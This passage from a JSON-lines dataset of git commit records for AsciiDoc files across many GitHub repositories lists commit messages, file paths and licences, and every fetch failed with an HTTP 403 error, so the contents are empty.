2015-08-19-Mein-Problem-mit-Sozial-Media-und-dem-Internet-im-allgemeinen-heutzutage.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-08-19-Mein-Problem-mit-Sozial-Media-und-dem-Internet-im-allgemeinen-heutzutage.adoc","new_file":"_posts\/2015-08-19-Mein-Problem-mit-Sozial-Media-und-dem-Internet-im-allgemeinen-heutzutage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc435613c63de609328245e954b0f59abb108e3b","subject":"Fixed link in docs","message":"Fixed link in docs\n","repos":"netdava\/jbakery,netdava\/jbakery","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netdava\/jbakery.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c0c093f4f9a3cd75b2272589c31966e043c1354e","subject":"Update 2017-02-14-Testing.adoc","message":"Update 2017-02-14-Testing.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-02-14-Testing.adoc","new_file":"_posts\/2017-02-14-Testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8624212f6192425979e1b7b9744bf5274f3fdeb3","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"575655934ca5c1073edb9fb96fe0a94aec22ab0e","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68ad7c818fb1b65427eab1c022b03b6359ce788d","subject":"example of structure analysis (see getting started doc page)","message":"example of structure analysis (see getting started doc page)\n","repos":"remicollet\/php-reflect,llaville\/php-reflect","old_file":"docs\/structure_analysis.out.asciidoc","new_file":"docs\/structure_analysis.out.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remicollet\/php-reflect.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"4b1137e068375e324c411a1b1227aca0eb5ce53f","subject":"Update 
2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92b0944ef7c5fcdded19996648cd55f2ee9bc231","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80cd451492fb47f7341b1784ae3f19031e5f9fac","subject":"initial Readme","message":"initial Readme\n","repos":"tuxdevelop\/spring-cloud-demo,tuxdevelop\/spring-cloud-demo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tuxdevelop\/spring-cloud-demo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"00f4770673d06d95cda1226a514ef5f9a138cfd7","subject":"Create README.adoc","message":"Create README.adoc","repos":"jbossas\/jboss-threads","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbossas\/jboss-threads.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9ea8de459f14ecd0b775d8fb0ce988b1f214505c","subject":"Update 2011-07-17-Git-pour-les-imbeciles-comme-moi.adoc","message":"Update 2011-07-17-Git-pour-les-imbeciles-comme-moi.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2011-07-17-Git-pour-les-imbeciles-comme-moi.adoc","new_file":"_posts\/2011-07-17-Git-pour-les-imbeciles-comme-moi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebe4e9d8eed8be766f814e16d959ce1e7ee0526c","subject":"Update 2016-09-26-Military-Applications-of-Bionics.adoc","message":"Update 
2016-09-26-Military-Applications-of-Bionics.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-09-26-Military-Applications-of-Bionics.adoc","new_file":"_posts\/2016-09-26-Military-Applications-of-Bionics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89f54eb4eb10eebf308258b02acb5d0060950ac3","subject":"minor","message":"minor\n","repos":"kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"trex_index.asciidoc","new_file":"trex_index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"44be87d4d10f3949fa744fbce9a958bdb466b1ca","subject":"Added README.","message":"Added README.\n\nSigned-off-by: Victory000 <2d7f9c62d729f8739ff5b330a8a961c96a7aeacf@gmail.com>\n","repos":"Victory000\/game,Victory000\/game,VictoriaLacroix\/game","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Victory000\/game.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9915fb9425b2ef24aae2219c0be5c13f34bd711f","subject":"Adding simple readme file with travis badge.","message":"Adding simple readme file with travis badge.\n","repos":"jpkrohling\/hawkular-commons,lucasponce\/hawkular-commons,hawkular\/hawkular-commons,hawkular\/hawkular-commons,lucasponce\/hawkular-commons,tsegismont\/hawkular-commons,ppalaga\/hawkular-commons,lucasponce\/hawkular-commons,hawkular\/hawkular-commons,hawkular\/hawkular-commons,jpkrohling\/hawkular-commons,lucasponce\/hawkular-commons","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tsegismont\/hawkular-commons.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aeed227b8952b7cd01f89ca52a96d70a24ccc515","subject":"Updated documentation","message":"Updated documentation\n","repos":"drmaas\/resilience4j,resilience4j\/resilience4j,goldobin\/resilience4j,resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker,mehtabsinghmann\/resilience4j,RobWin\/circuitbreaker-java8,RobWin\/javaslang-circuitbreaker,drmaas\/resilience4j,storozhukBM\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7aea5d6878c37874c059ef81c245b3b241a8bafd","subject":"Updated documentation","message":"Updated 
documentation\n","repos":"drmaas\/resilience4j,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,goldobin\/resilience4j,javaslang\/javaslang-circuitbreaker,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j,RobWin\/javaslang-circuitbreaker,RobWin\/circuitbreaker-java8,resilience4j\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"67820a951a61f59cef7442cf7c5d6c102100b70a","subject":"Initial drop","message":"Initial drop\n","repos":"learning-spring-boot\/learning-spring-boot-code-1.2,learning-spring-boot\/learning-spring-boot-code-1.2,learning-spring-boot\/learning-spring-boot-code,learning-spring-boot\/learning-spring-boot-code-1.2,learning-spring-boot\/learning-spring-boot-code,trifonnt\/_book-learning-spring-boot-code,learning-spring-boot\/learning-spring-boot-code,trifonnt\/_book-learning-spring-boot-code","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/learning-spring-boot\/learning-spring-boot-code-1.2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bebaacd42364527ec4d9c566720bff3b11b94fe8","subject":"Add README which includes internal todo-list.","message":"Add README which includes internal todo-list.\n","repos":"IanDarwin\/TodoModel,IanDarwin\/TodoDataModel","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IanDarwin\/TodoDataModel.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d99cd50d2a9c967187cb84d4fc2b12bd2d95b193","subject":"y2b create post Otterbox Reflex Series iPad 2 Case Unboxing","message":"y2b create post Otterbox Reflex Series iPad 2 Case Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-16-Otterbox-Reflex-Series-iPad-2-Case-Unboxing.adoc","new_file":"_posts\/2011-12-16-Otterbox-Reflex-Series-iPad-2-Case-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02cff5378ae45025ed09b9c9283a1f4f7927d14f","subject":"writing document","message":"writing document\n","repos":"skoba\/mml,skoba\/mml","old_file":"doc\/mml4.adoc","new_file":"doc\/mml4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skoba\/mml.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5e9428a82cd20e6fb7bab9f85dba88fae29d114e","subject":"Update 2015-07-21-Another-impressjs-plugin-for-WordPress.adoc","message":"Update 
2015-07-21-Another-impressjs-plugin-for-WordPress.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-07-21-Another-impressjs-plugin-for-WordPress.adoc","new_file":"_posts\/2015-07-21-Another-impressjs-plugin-for-WordPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d6635677d4e6a35931f438cfae894736d23cfd8","subject":"Update 2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","message":"Update 2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58b436e6cdea429090cbbc9d2a69abf3fe9aae1a","subject":"How it works","message":"How it works\n","repos":"javatechs\/RxCmd,javatechs\/RxCmd,javatechs\/RxCmd","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javatechs\/RxCmd.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"64f8d3dd06d414d0544e018e0a774ced52f7a722","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55f5a6a12e6b904d81bd2d5ca74442303ab6ac1c","subject":"Update 2015-08-14-First.adoc","message":"Update 2015-08-14-First.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-First.adoc","new_file":"_posts\/2015-08-14-First.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d65a57cb13353cae9fe774ac5a31adb8ad72c3c","subject":"Added blender doc on baking.","message":"Added blender doc on baking.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/blender\/blender_action_baking.adoc","new_file":"src\/docs\/asciidoc\/blender\/blender_action_baking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL 
returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"14eb3ede669231a0ec3d22a071cb4fc061148f7c","subject":"Create LICENSE.adoc","message":"Create LICENSE.adoc","repos":"microserviceux\/photon,microserviceux\/photon,microserviceux\/photon","old_file":"LICENSE.adoc","new_file":"LICENSE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/microserviceux\/photon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ba8648a0278a24bcc75acf0fc6f59fa71d4751c3","subject":"Add manpage for pegasus-service-catalogs","message":"Add manpage for pegasus-service-catalogs\n","repos":"pegasus-isi\/pegasus,pegasus-isi\/pegasus,pegasus-isi\/pegasus,pegasus-isi\/pegasus,pegasus-isi\/pegasus-service,pegasus-isi\/pegasus,pegasus-isi\/pegasus-service,pegasus-isi\/pegasus,pegasus-isi\/pegasus,pegasus-isi\/pegasus-service,pegasus-isi\/pegasus,pegasus-isi\/pegasus,pegasus-isi\/pegasus","old_file":"doc\/pegasus-service-catalogs.asciidoc","new_file":"doc\/pegasus-service-catalogs.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pegasus-isi\/pegasus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"12a2a4c79a58bdbd6266e23f91ad485de33795b7","subject":"Update 2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","message":"Update 2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","new_file":"_posts\/2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a14760dff09f8a95eadd9a300f5dd105f2310a4","subject":"Update 2018-03-10-Showing-or-Hiding-Password.adoc","message":"Update 2018-03-10-Showing-or-Hiding-Password.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2018-03-10-Showing-or-Hiding-Password.adoc","new_file":"_posts\/2018-03-10-Showing-or-Hiding-Password.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be22ed0b1cad0fe7436c620076e0ee7f9d8b8c47","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/on_abundance_and_moderation.adoc","new_file":"content\/writings\/on_abundance_and_moderation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"6a468e2d69be34e611fa768cecf0ea27ce94606e","subject":"Add new guide on Clojure equality","message":"Add new guide on Clojure equality\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/equality.adoc","new_file":"content\/guides\/equality.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5cfa100e100636b36562b392c3475281e3f84fb8","subject":"Update 2017-04-01-Kathiyawadi-Dahi-bhindi-recipe.adoc","message":"Update 2017-04-01-Kathiyawadi-Dahi-bhindi-recipe.adoc","repos":"birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io,birvajoshi\/birvajoshi.github.io","old_file":"_posts\/2017-04-01-Kathiyawadi-Dahi-bhindi-recipe.adoc","new_file":"_posts\/2017-04-01-Kathiyawadi-Dahi-bhindi-recipe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/birvajoshi\/birvajoshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbfce49abf500d43bc623fb86d8d50a8035785c6","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27e6eda648a19c382a1aa0c024672c5799e4f31a","subject":"y2b create post DON'T Buy The Google Pixel Buds","message":"y2b create post DON'T Buy The Google Pixel Buds","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-07-DONT-Buy-The-Google-Pixel-Buds.adoc","new_file":"_posts\/2018-02-07-DONT-Buy-The-Google-Pixel-Buds.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65d02449807f09db7b8ca2a3ab0df5173b19bd93","subject":"Update 2014-05-31-Everything-in-code.adoc","message":"Update 2014-05-31-Everything-in-code.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-05-31-Everything-in-code.adoc","new_file":"_posts\/2014-05-31-Everything-in-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cfbcff3d84dd01482ea00d8eabc7d0a77fecee5","subject":"Update 2015-06-16-My-first-blog-post.adoc","message":"Update 2015-06-16-My-first-blog-post.adoc","repos":"2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io","old_file":"_posts\/2015-06-16-My-first-blog-post.adoc","new_file":"_posts\/2015-06-16-My-first-blog-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2mosquitoes\/2mosquitoes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e445a96fd39b6ed9fb41f72a3efb32ba50b9e2a","subject":"Update 2016-04-08-Un-poco-de-Harding.adoc","message":"Update 
2016-04-08-Un-poco-de-Harding.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Un-poco-de-Harding.adoc","new_file":"_posts\/2016-04-08-Un-poco-de-Harding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f95e1b65aae0e3cc11eb1d92eb8fcc57c6641bd5","subject":"Update 2017-01-23-DER-TEXT-ALS-AUTOR.adoc","message":"Update 2017-01-23-DER-TEXT-ALS-AUTOR.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-01-23-DER-TEXT-ALS-AUTOR.adoc","new_file":"_posts\/2017-01-23-DER-TEXT-ALS-AUTOR.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eed936604821506c97911b88346c227d9e54e5bc","subject":"Update 2018-05-24-Rust-tips-n-tricks.adoc","message":"Update 2018-05-24-Rust-tips-n-tricks.adoc","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2018-05-24-Rust-tips-n-tricks.adoc","new_file":"_posts\/2018-05-24-Rust-tips-n-tricks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ed61a96cb0746004b690d32a862d5654a88f3f4","subject":"y2b create post The Most RIDICULOUS MacBook Pro","message":"y2b create post The Most RIDICULOUS MacBook Pro","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-05-The%20Most%20RIDICULOUS%20MacBook%20Pro.adoc","new_file":"_posts\/2018-01-05-The%20Most%20RIDICULOUS%20MacBook%20Pro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f92fdc88463b41fd62c8fac1bab41a12c809942","subject":"Added documentation about BAM key","message":"Added documentation about BAM key\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Background Activity Moderator key.asciidoc","new_file":"documentation\/Background Activity Moderator key.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51fc8c0df5c2ff44fa6427f7d1dc9e5ede205a4a","subject":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","message":"Update 
2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26b54fecb92ff5f53fd258c656f35a6879917e5b","subject":"README with instructions on using AsciiDoc and Markdown","message":"README with instructions on using AsciiDoc and Markdown\n","repos":"UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources","old_file":"Development-Guide\/AsciiDoc-and-Markdown-Guide\/README.adoc","new_file":"Development-Guide\/AsciiDoc-and-Markdown-Guide\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/UCSolarCarTeam\/Recruit-Resources.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"805362c240c6689052b09b970ed9883738edc6d7","subject":"change some lines","message":"change some lines\n","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2019-04-07-IPSec S2S - From Azure Stack to Mikrotik.adoc","new_file":"_posts\/2019-04-07-IPSec S2S - From Azure Stack to Mikrotik.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4dd382901906db8edb0d25049eab4d2406fbea20","subject":"CAMEL-14551 - Create an AWS-SES component based on SDK v2, regen docs","message":"CAMEL-14551 - Create an AWS-SES component based on SDK v2, regen 
